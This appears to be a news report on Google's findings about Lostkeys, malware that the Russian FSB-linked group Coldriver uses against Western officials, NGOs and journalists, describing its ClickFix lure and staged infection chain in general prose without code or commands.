Russian FSB Hackers Unleash New Lostkeys Malware

Recent reports indicate that Russian cyber espionage group Coldriver is deploying a new strain of malware known as “Lostkeys” in a targeted operation against Western officials, non-governmental organizations (NGOs), and journalists. This campaign highlights an unsettling escalation in cyber threats emanating from the region.

Google’s threat intelligence team links Lostkeys to Coldriver, widely referred to as UNC4057, Star Blizzard, and Callisto. This operational subgroup within the Russian Federal Security Service—successor to the KGB—has built a notorious reputation for credential phishing attacks. The emergence of Lostkeys points toward a significant enhancement in their capabilities, utilizing a sophisticated multi-stage infection chain aimed at document theft and sensitive data harvesting.

Several members of Coldriver have faced indictments in the U.S. and have been sanctioned across Europe, the U.K., and the United States. A December 2023 advisory from the Five Eyes intelligence alliance explicitly warned stakeholders about the group’s continued operational activity, corroborated by earlier accusations regarding a so-called “hack and leak” initiative.

The introduction of Lostkeys marks a crucial evolution in Coldriver’s methodology, transitioning from mere credential theft to comprehensive system infiltration. This malware is deployed judiciously, targeting individuals and organizations deemed high-value assets, as reported by Google.

Activity involving Lostkeys has been observed as early as January 2024, with possible indications of an initial appearance in December 2023. The group’s targets typically encompass a range of former and current Western government advisors, think tanks, and individuals associated with Ukraine.

The attack mechanism initiated by Lostkeys begins with a deceptive Captcha page, tricking the victims into pasting harmful PowerShell code into their Windows Run prompt—a tactic recognized as “ClickFix.” This method circumvents standard security measures, heavily relying on user compliance to execute the malicious code successfully.

Upon execution, the PowerShell script retrieves a series of payloads from a command-and-control server, with each payload necessitating unique identifiers for every target. The malware demonstrates capabilities for evading detection, checking the device’s display resolution hash before proceeding to the final execution stage, effectively halting if it recognizes a virtual machine environment.

Ultimately, the final payload—a Visual Basic Script—exfiltrates files with targeted extensions, gathers critical system data and running processes, and transmits them back to the attackers using a uniquely encoded format. The function is reminiscent of earlier malware strains like Spica, which Coldriver used in 2024, but represents a significantly more refined architecture.

While early samples of Lostkeys appeared to disguise themselves as legitimate applications and leverage executable files instead of PowerShell, Google has yet to determine whether these versions were part of the same campaign or were iterations of malware repurposed by another actor.